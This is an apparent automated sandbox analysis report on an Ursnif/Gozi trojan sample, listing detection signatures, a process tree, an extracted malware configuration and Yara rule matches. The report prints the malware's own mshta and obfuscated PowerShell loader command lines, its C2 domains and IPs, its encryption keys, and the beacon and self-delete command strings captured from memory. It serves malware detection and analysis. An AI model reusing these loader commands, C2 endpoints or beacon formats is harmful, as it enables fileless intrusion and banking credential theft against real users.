Edit tour

Windows Analysis Report
bf.exe

Overview

General Information

Sample Name:	bf.exe
Analysis ID:	722154
MD5:	b7ce4f9f6ecd85bb5edbb6964226fdb6
SHA1:	12b28a42e960dfc522348eba37b00ea74a0df527
SHA256:	bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
Tags:	exegozi
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Antivirus / Scanner detection for submitted sample

Snort IDS alert for network traffic

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Writes to foreign memory regions

Writes or reads registry keys via WMI

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Modifies the context of a thread in another process (thread injection)

Creates a thread in another existing process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Modifies the import address table of user mode modules (user mode IAT hooks)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

bf.exe (PID: 1364 cmdline: C:\Users\user\Desktop\bf.exe MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)

control.exe (PID: 4784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

mshta.exe (PID: 5064 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 3340 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 2888 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
